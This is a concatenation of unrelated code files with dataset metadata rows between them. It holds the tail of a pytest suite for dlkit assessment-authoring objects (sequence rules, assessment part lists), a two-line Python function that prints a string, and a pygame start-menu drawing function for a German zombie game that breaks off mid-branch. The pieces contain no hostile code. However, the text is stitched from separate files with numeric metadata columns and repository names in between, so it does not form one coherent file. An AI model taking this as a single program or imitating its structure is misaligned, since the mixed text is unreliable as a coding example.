assessment_form.description = 'Test Assessment for AssessmentPartList tests'
request.cls.assessment = request.cls.catalog.create_assessment(assessment_form)
request.cls.form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident,
[])
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.catalog.use_unsequestered_assessment_part_view()
request.cls.catalog.delete_assessment(request.cls.assessment.ident)
request.cls.svc_mgr.delete_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def assessment_part_list_test_fixture(request):
from dlkit.json_.assessment_authoring.objects import AssessmentPartList
request.cls.assessment_part_list = list()
request.cls.assessment_part_ids = list()
if not is_never_authz(request.cls.service_config):
for num in [0, 1]:
form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
obj = request.cls.catalog.create_assessment_part_for_assessment(form)
request.cls.assessment_part_list.append(obj)
request.cls.assessment_part_ids.append(obj.ident)
request.cls.assessment_part_list = AssessmentPartList(request.cls.assessment_part_list)
@pytest.mark.usefixtures("assessment_part_list_class_fixture", "assessment_part_list_test_fixture")
class TestAssessmentPartList(object):
"""Tests for AssessmentPartList"""
def test_get_next_assessment_part(self):
"""Tests get_next_assessment_part"""
# From test_templates/resource.py::ResourceList::get_next_resource_template
from dlkit.abstract_osid.assessment_authoring.objects import AssessmentPart
if not is_never_authz(self.service_config):
assert isinstance(self.assessment_part_list.get_next_assessment_part(), AssessmentPart)
def test_get_next_assessment_parts(self):
"""Tests get_next_assessment_parts"""
# From test_templates/resource.py::ResourceList::get_next_resources_template
from dlkit.abstract_osid.assessment_authoring.objects import AssessmentPartList, AssessmentPart
if not is_never_authz(self.service_config):
new_list = self.assessment_part_list.get_next_assessment_parts(2)
assert isinstance(new_list, AssessmentPartList)
for item in new_list:
assert isinstance(item, AssessmentPart)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def sequence_rule_class_fixture(request):
request.cls.service_config = request.param
request.cls.sequence_rule_list = list()
request.cls.sequence_rule_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_bank_form_for_create([])
create_form.display_name = 'Test Bank'
create_form.description = 'Test Bank for SequenceRule tests'
request.cls.catalog = request.cls.svc_mgr.create_bank(create_form)
create_form = request.cls.catalog.get_assessment_form_for_create([])
create_form.display_name = 'Test Assessment'
create_form.description = 'Test Assessment for SequenceRule tests'
request.cls.assessment = request.cls.catalog.create_assessment(create_form)
create_form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
create_form.display_name = 'Test Assessment Part 1'
create_form.description = 'Test Assessment Part for SequenceRule tests'
request.cls.assessment_part_1 = request.cls.catalog.create_assessment_part_for_assessment(create_form)
create_form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
create_form.display_name = 'Test Assessment Part 2'
create_form.description = 'Test Assessment Part for SequenceRule tests'
request.cls.assessment_part_2 = request.cls.catalog.create_assessment_part_for_assessment(create_form)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_assessment_parts():
request.cls.catalog.delete_assessment_part(obj.ident)
for obj in request.cls.catalog.get_assessments():
request.cls.catalog.delete_assessment(obj.ident)
request.cls.svc_mgr.delete_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def sequence_rule_test_fixture(request):
if not is_never_authz(request.cls.service_config):
form = request.cls.catalog.get_sequence_rule_form_for_create(request.cls.assessment_part_1.ident,
request.cls.assessment_part_2.ident,
[])
request.cls.object = request.cls.catalog.create_sequence_rule(form)
@pytest.mark.usefixtures("sequence_rule_class_fixture", "sequence_rule_test_fixture")
class TestSequenceRule(object):
"""Tests for SequenceRule"""
def test_get_assessment_part_id(self):
"""Tests get_assessment_part_id"""
if not is_never_authz(self.service_config):
part_id = self.object.get_assessment_part_id()
assert isinstance(part_id, Id)
assert str(part_id) == str(self.assessment_part_1.ident)
def test_get_assessment_part(self):
"""Tests get_assessment_part"""
if not is_never_authz(self.service_config):
part = self.object.get_assessment_part()
assert isinstance(part, AssessmentPart)
assert str(part.ident) == str(self.assessment_part_1.ident)
@pytest.mark.skip('unimplemented test')
def test_get_next_assessment_part_id(self):
"""Tests get_next_assessment_part_id"""
pass
def test_get_next_assessment_part(self):
"""Tests get_next_assessment_part"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_next_assessment_part()
def test_get_minimum_score(self):
"""Tests get_minimum_score"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_minimum_score()
def test_get_maximum_score(self):
"""Tests get_maximum_score"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_maximum_score()
def test_is_cumulative(self):
"""Tests is_cumulative"""
# From test_templates/resources.py::Resource::is_group_template
if not is_never_authz(self.service_config):
assert isinstance(self.object.is_cumulative(), bool)
def test_get_applied_assessment_part_ids(self):
"""Tests get_applied_assessment_part_ids"""
if not is_never_authz(self.service_config):
result = self.object.get_applied_assessment_part_ids()
assert isinstance(result, IdList)
assert result.available() == 0
def test_get_applied_assessment_parts(self):
"""Tests get_applied_assessment_parts"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_applied_assessment_parts()
def test_get_sequence_rule_record(self):
"""Tests get_sequence_rule_record"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unsupported):
self.object.get_sequence_rule_record(True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def sequence_rule_form_class_fixture(request):
request.cls.service_config = request.param
request.cls.sequence_rule_list = list()
request.cls.sequence_rule_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_bank_form_for_create([])
create_form.display_name = 'Test Bank'
create_form.description = 'Test Bank for SequenceRuleForm tests'
request.cls.catalog = request.cls.svc_mgr.create_bank(create_form)
create_form = request.cls.catalog.get_assessment_form_for_create([])
create_form.display_name = 'Test Assessment'
create_form.description = 'Test Assessment for SequenceRuleForm tests'
request.cls.assessment = request.cls.catalog.create_assessment(create_form)
create_form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
create_form.display_name = 'Test Assessment Part 1'
create_form.description = 'Test Assessment Part for SequenceRuleForm tests'
request.cls.assessment_part_1 = request.cls.catalog.create_assessment_part_for_assessment(create_form)
create_form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
create_form.display_name = 'Test Assessment Part 2'
create_form.description = 'Test Assessment Part for SequenceRuleForm tests'
request.cls.assessment_part_2 = request.cls.catalog.create_assessment_part_for_assessment(create_form)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_assessment_parts():
request.cls.catalog.delete_assessment_part(obj.ident)
for obj in request.cls.catalog.get_assessments():
request.cls.catalog.delete_assessment(obj.ident)
request.cls.svc_mgr.delete_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def sequence_rule_form_test_fixture(request):
if not is_never_authz(request.cls.service_config):
request.cls.form = request.cls.catalog.get_sequence_rule_form_for_create(request.cls.assessment_part_1.ident,
request.cls.assessment_part_2.ident,
[])
request.cls.object = request.cls.form
@pytest.mark.usefixtures("sequence_rule_form_class_fixture", "sequence_rule_form_test_fixture")
class TestSequenceRuleForm(object):
"""Tests for SequenceRuleForm"""
def test_get_minimum_score_metadata(self):
"""Tests get_minimum_score_metadata"""
# From test_templates/resource.py::ResourceForm::get_group_metadata_template
if not is_never_authz(self.service_config):
mdata = self.form.get_minimum_score_metadata()
assert isinstance(mdata, Metadata)
assert isinstance(mdata.get_element_id(), ABC_Id)
assert isinstance(mdata.get_element_label(), ABC_DisplayText)
assert isinstance(mdata.get_instructions(), ABC_DisplayText)
assert mdata.get_syntax() == 'CARDINAL'
assert not mdata.is_array()
assert isinstance(mdata.is_required(), bool)
assert isinstance(mdata.is_read_only(), bool)
assert isinstance(mdata.is_linked(), bool)
def test_set_minimum_score(self):
"""Tests set_minimum_score"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.object.set_minimum_score(True)
def test_get_maximum_score_metadata(self):
"""Tests get_maximum_score_metadata"""
# From test_templates/resource.py::ResourceForm::get_group_metadata_template
if not is_never_authz(self.service_config):
mdata = self.form.get_maximum_score_metadata()
assert isinstance(mdata, Metadata)
assert isinstance(mdata.get_element_id(), ABC_Id)
assert isinstance(mdata.get_element_label(), ABC_DisplayText)
assert isinstance(mdata.get_instructions(), ABC_DisplayText)
assert mdata.get_syntax() == 'CARDINAL'
assert not mdata.is_array()
assert isinstance(mdata.is_required(), bool)
assert isinstance(mdata.is_read_only(), bool)
assert isinstance(mdata.is_linked(), bool)
def test_set_maximum_score(self):
"""Tests set_maximum_score"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.object.set_maximum_score(True)
def test_get_cumulative_metadata(self):
"""Tests get_cumulative_metadata"""
# From test_templates/resource.py::ResourceForm::get_group_metadata_template
if not is_never_authz(self.service_config):
mdata = self.form.get_cumulative_metadata()
assert isinstance(mdata, Metadata)
assert isinstance(mdata.get_element_id(), ABC_Id)
assert isinstance(mdata.get_element_label(), ABC_DisplayText)
assert isinstance(mdata.get_instructions(), ABC_DisplayText)
assert mdata.get_syntax() == 'BOOLEAN'
assert not mdata.is_array()
assert isinstance(mdata.is_required(), bool)
assert isinstance(mdata.is_read_only(), bool)
assert isinstance(mdata.is_linked(), bool)
def test_set_cumulative(self):
"""Tests set_cumulative"""
if not is_never_authz(self.service_config):
create_form = self.catalog.get_sequence_rule_form_for_create(self.assessment_part_1.ident,
self.assessment_part_2.ident,
[])
create_form.set_cumulative(True)
assert create_form._my_map['cumulative']
def test_get_applied_assessment_parts_metadata(self):
"""Tests get_applied_assessment_parts_metadata"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_applied_assessment_parts_metadata()
def test_apply_assessment_parts(self):
"""Tests apply_assessment_parts"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.object.apply_assessment_parts(True)
def test_get_sequence_rule_form_record(self):
"""Tests get_sequence_rule_form_record"""
if not is_never_authz(self.service_config):
with pytest.raises(errors.Unsupported):
self.form.get_sequence_rule_form_record(Type('osid.Osid%3Afake-record%40ODL.MIT.EDU'))
# Here check for a real record?
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def sequence_rule_list_class_fixture(request):
request.cls.service_config = request.param
request.cls.sequence_rule_list = list()
request.cls.sequence_rule_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_bank_form_for_create([])
create_form.display_name = 'Test Bank'
create_form.description = 'Test Bank for SequenceRuleList tests'
request.cls.catalog = request.cls.svc_mgr.create_bank(create_form)
create_form = request.cls.catalog.get_assessment_form_for_create([])
create_form.display_name = 'Test Assessment'
create_form.description = 'Test Assessment for SequenceRuleList tests'
request.cls.assessment = request.cls.catalog.create_assessment(create_form)
create_form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
create_form.display_name = 'Test Assessment Part 1'
create_form.description = 'Test Assessment Part for SequenceRuleList tests'
request.cls.assessment_part_1 = request.cls.catalog.create_assessment_part_for_assessment(create_form)
create_form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident, [])
create_form.display_name = 'Test Assessment Part 2'
create_form.description = 'Test Assessment Part for SequenceRuleList tests'
request.cls.assessment_part_2 = request.cls.catalog.create_assessment_part_for_assessment(create_form)
request.cls.form = request.cls.catalog.get_sequence_rule_form_for_create(request.cls.assessment_part_1.ident,
request.cls.assessment_part_2.ident,
[])
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_sequence_rules():
request.cls.catalog.delete_sequence_rule(obj.ident)
for obj in request.cls.catalog.get_assessments():
request.cls.catalog.delete_assessment(obj.ident)
request.cls.svc_mgr.delete_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def sequence_rule_list_test_fixture(request):
from dlkit.json_.assessment_authoring.objects import SequenceRuleList
request.cls.sequence_rule_list = list()
request.cls.sequence_rule_ids = list()
if not is_never_authz(request.cls.service_config):
for num in [0, 1]:
form = request.cls.catalog.get_sequence_rule_form_for_create(request.cls.assessment_part_1.ident,
request.cls.assessment_part_2.ident,
[])
obj = request.cls.catalog.create_sequence_rule(form)
request.cls.sequence_rule_list.append(obj)
request.cls.sequence_rule_ids.append(obj.ident)
request.cls.sequence_rule_list = SequenceRuleList(request.cls.sequence_rule_list)
@pytest.mark.usefixtures("sequence_rule_list_class_fixture", "sequence_rule_list_test_fixture")
class TestSequenceRuleList(object):
"""Tests for SequenceRuleList"""
def test_get_next_sequence_rule(self):
"""Tests get_next_sequence_rule"""
# From test_templates/resource.py::ResourceList::get_next_resource_template
from dlkit.abstract_osid.assessment_authoring.objects import SequenceRule
if not is_never_authz(self.service_config):
assert isinstance(self.sequence_rule_list.get_next_sequence_rule(), SequenceRule)
def test_get_next_sequence_rules(self):
"""Tests get_next_sequence_rules"""
# From test_templates/resource.py::ResourceList::get_next_resources_template
from dlkit.abstract_osid.assessment_authoring.objects import SequenceRuleList, SequenceRule
if not is_never_authz(self.service_config):
new_list = self.sequence_rule_list.get_next_sequence_rules(2)
assert isinstance(new_list, SequenceRuleList)
for item in new_list:
assert isinstance(item, SequenceRule)
| 50.223561 | 176 | 0.687901 | 4,483 | 37,517 | 5.426723 | 0.048405 | 0.081388 | 0.049614 | 0.022197 | 0.882974 | 0.814041 | 0.764099 | 0.753288 | 0.743218 | 0.733969 | 0 | 0.003815 | 0.224405 | 37,517 | 746 | 177 | 50.290885 | 0.832257 | 0.085588 | 0 | 0.667257 | 0 | 0 | 0.083485 | 0.037467 | 0 | 0 | 0 | 0 | 0.141593 | 1 | 0.106195 | false | 0.035398 | 0.037168 | 0 | 0.153982 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b70da2bab356c08199cc72fe1365096c5899d534 | 39 | py | Python | tests/modules/imported/alias_fns.py | MoonStarCZW/py2rb | 89b247717d33d780fbf143e1583bfe9252984da4 | [
"MIT"
] | 124 | 2017-08-19T05:37:16.000Z | 2022-03-08T18:24:18.000Z | tests/modules/imported/alias_fns.py | MoonStarCZW/py2rb | 89b247717d33d780fbf143e1583bfe9252984da4 | [
"MIT"
] | 15 | 2017-12-16T05:59:31.000Z | 2022-02-08T02:51:17.000Z | tests/modules/imported/alias_fns.py | MoonStarCZW/py2rb | 89b247717d33d780fbf143e1583bfe9252984da4 | [
"MIT"
] | 18 | 2017-09-25T11:57:04.000Z | 2022-02-19T17:33:48.000Z |
def foo():
print("this is foo")
| 6.5 | 24 | 0.512821 | 6 | 39 | 3.333333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 39 | 5 | 25 | 7.8 | 0.740741 | 0 | 0 | 0 | 0 | 0 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b71197e84e9e952e81bef0b65c265f0a2a1e7e7a | 50,197 | py | Python | menus.py | astroPythoner/Lehrer_vs_Zombies | 4f9f933f502da803db5936a32c15df26f67a198a | [
"MIT"
] | 1 | 2020-02-02T21:03:49.000Z | 2020-02-02T21:03:49.000Z | menus.py | astroPythoner/Lehrer_vs_Zombies | 4f9f933f502da803db5936a32c15df26f67a198a | [
"MIT"
] | null | null | null | menus.py | astroPythoner/Lehrer_vs_Zombies | 4f9f933f502da803db5936a32c15df26f67a198a | [
"MIT"
] | null | null | null | from constants import *
from window_resize import *
from time import time
from drawing import draw_text
# Hauptbildschirm
def draw_start_game_screen(game, cursor_pos, loading=False):
return_dict = {}
# Hintergrund
game.screen.blit(game.background, game.background_rect)
# Einstellungen
if cursor_pos[0] == 0 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict["Einstellungen"] = draw_text(game.screen, "Einstellungen", game.NORMAL_TEXT, 10, 10, rect_place="oben_links", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Einstellungen"] = draw_text(game.screen, "Einstellungen", game.NORMAL_TEXT, 10, 10, rect_place="oben_links", color=AUSWAHL_TEXT_COLOR)
# Spielerkaerung
if cursor_pos[0] == 0 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict["Hilfe"] = draw_text(game.screen, "Hilfe/Erklärung", game.NORMAL_TEXT, game.WIDTH - 10, 10, rect_place="oben_rechts", color=AUSWAHL_TEXT_SELECTED)
else:
return_dict["Hilfe"] = draw_text(game.screen, "Hilfe/Erklärung", game.NORMAL_TEXT, game.WIDTH - 10, 10, rect_place="oben_rechts", color=AUSWAHL_TEXT_COLOR)
# Titel
if game.game_status == PLAYER_DIED:
draw_text(game.screen, "GAME OVER", game.GIANT_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.13), rect_place="mitte", color=AUSWAHL_TEXT_RED)
elif game.game_status == WON_GAME:
draw_text(game.screen, "YOU WON", game.GIANT_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.13), rect_place="mitte", color=AUSWAHL_TEXT_GREEN)
else:
draw_text(game.screen, "Zombie!", game.GIANT_TEXT, int(game.WIDTH / 2), int(game.HEIGHT * 0.13), rect_place="mitte", color=AUSWAHL_TEXT_COLOR)
# Schwierigkeit
circle_size = calculate_fit_size(game,0.026, 0.039)
draw_text(game.screen, "Schwierigkeit", int(game.BIG_TEXT * 1.2), int(game.WIDTH / 2), int(game.HEIGHT * 0.25), color=AUSWAHL_TEXT_COLOR)
pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, (int(game.WIDTH * (1 / 6)), int(game.HEIGHT * 0.38)), (int(game.WIDTH * (5 / 6)), int(game.HEIGHT * 0.38)), 5)
for schwierigkeitsstufe in range(1, 6):
if game.schwierigkeit == schwierigkeitsstufe and not loading:
if cursor_pos[0] == 1 and (cursor_pos[1] == schwierigkeitsstufe - 1 or schwierigkeitsstufe == 5 and cursor_pos[1] > 4):
return_dict["Schwierigkeit_" + str(schwierigkeitsstufe)] = pygame.draw.circle(game.screen, AUSWAHL_TEXT_GREEN_SELECTED, (int(game.WIDTH * (schwierigkeitsstufe / 6)), int(game.HEIGHT * 0.38)), circle_size, 0)
else:
return_dict["Schwierigkeit_" + str(schwierigkeitsstufe)] = pygame.draw.circle(game.screen, AUSWAHL_TEXT_GREEN, (int(game.WIDTH * (schwierigkeitsstufe / 6)), int(game.HEIGHT * 0.38)), circle_size, 0)
elif cursor_pos[0] == 1 and (cursor_pos[1] == schwierigkeitsstufe - 1 or schwierigkeitsstufe == 5 and cursor_pos[1] > 4):
return_dict["Schwierigkeit_" + str(schwierigkeitsstufe)] = pygame.draw.circle(game.screen, AUSWAHL_TEXT_SELECTED, (int(game.WIDTH * (schwierigkeitsstufe / 6)), int(game.HEIGHT * 0.38)), circle_size, 0)
else:
return_dict["Schwierigkeit_" + str(schwierigkeitsstufe)] = pygame.draw.circle(game.screen, AUSWAHL_TEXT_COLOR, (int(game.WIDTH * (schwierigkeitsstufe / 6)), int(game.HEIGHT * 0.38)), circle_size, 0)
draw_text(game.screen, str(schwierigkeitsstufe), int(circle_size * 1.3), int(game.WIDTH * (schwierigkeitsstufe / 6)), int(game.HEIGHT * 0.38), color=BLACK, rect_place="mitte")
# Spielmodus
draw_text(game.screen, "SPIELMODUS", int(game.BIG_TEXT * 1.2), int(game.WIDTH / 2), int(game.HEIGHT * 0.47), color=AUSWAHL_TEXT_COLOR)
if game.spielmodus == MAP_MODUS and not loading:
if cursor_pos[0] == 2 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
spielmodus_rect = draw_text(game.screen, "Zombie Map", game.NORMAL_TEXT, int(game.WIDTH * 2 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="mitte")
else:
spielmodus_rect = draw_text(game.screen, "Zombie Map", game.NORMAL_TEXT, int(game.WIDTH * 2 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_GREEN, rect_place="mitte")
return_dict[MAP_MODUS] = spielmodus_rect
elif cursor_pos[0] == 2 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
rect = draw_text(game.screen, "Zombie Map", game.NORMAL_TEXT, int(game.WIDTH * 2 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_SELECTED, rect_place="mitte")
return_dict[MAP_MODUS] = rect
elif game.spielmodus != MAP_MODUS or loading:
return_dict[MAP_MODUS] = draw_text(game.screen, "Zombie Map", game.NORMAL_TEXT, int(game.WIDTH * 2 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_COLOR, rect_place="mitte")
if loading and game.spielmodus == MAP_MODUS:
spielmodus_rect = return_dict[MAP_MODUS]
if game.spielmodus == ARENA_MODUS and not loading:
if cursor_pos[0] == 2 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
spielmodus_rect = draw_text(game.screen, "Arena Modus", game.NORMAL_TEXT, int(game.WIDTH * 1 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="mitte")
else:
spielmodus_rect = draw_text(game.screen, "Arena Modus", game.NORMAL_TEXT, int(game.WIDTH * 1 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_GREEN, rect_place="mitte")
return_dict[ARENA_MODUS] = spielmodus_rect
elif cursor_pos[0] == 2 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
rect = draw_text(game.screen, "Arena Modus", game.NORMAL_TEXT, int(game.WIDTH * 1 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_SELECTED, rect_place="mitte")
return_dict[ARENA_MODUS] = rect
elif game.spielmodus != ARENA_MODUS or loading:
return_dict[ARENA_MODUS] = draw_text(game.screen, "Arena Modus", game.NORMAL_TEXT, int(game.WIDTH * 1 / 3), int(game.HEIGHT * 0.57), color=AUSWAHL_TEXT_COLOR, rect_place="mitte")
if loading and game.spielmodus == ARENA_MODUS:
spielmodus_rect = return_dict[ARENA_MODUS]
# weitere Spielmodus einstellung
if game.spielmodus == MAP_MODUS:
pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, spielmodus_rect.midbottom, (int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62)), 3)
pygame.draw.line(game.screen, AUSWAHL_TEXT_COLOR, spielmodus_rect.midbottom, (int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62)), 3)
if game.genauerer_spielmodus == AFTER_TIME and not loading:
if cursor_pos[0] == 3 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
elif cursor_pos[0] == 3 and cursor_pos[1] <= int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_TIME + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
return_dict[AFTER_TIME + "1"] = draw_text(game.screen, "Zeit", game.NORMAL_TEXT, int(game.WIDTH * 2 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
if game.genauerer_spielmodus == AFTER_KILLED and not loading:
if cursor_pos[0] == 3 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_GREEN, rect_place="oben_mitte")
elif cursor_pos[0] == 3 and cursor_pos[1] > int(max([len(MAP_NAMES) - 1, 4]) / 2):
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_SELECTED, rect_place="oben_mitte")
else:
return_dict[AFTER_KILLED + "0"] = draw_text(game.screen, "Gewonnen nach", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62), color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
return_dict[AFTER_KILLED + "1"] = draw_text(game.screen, "töten aller Zombies", game.NORMAL_TEXT, int(game.WIDTH * 3 / 4), int(game.HEIGHT * 0.62) + game.NORMAL_TEXT + 5, color=AUSWAHL_TEXT_COLOR, rect_place="oben_mitte")
elif game.spielmodus == ARENA_MODUS:
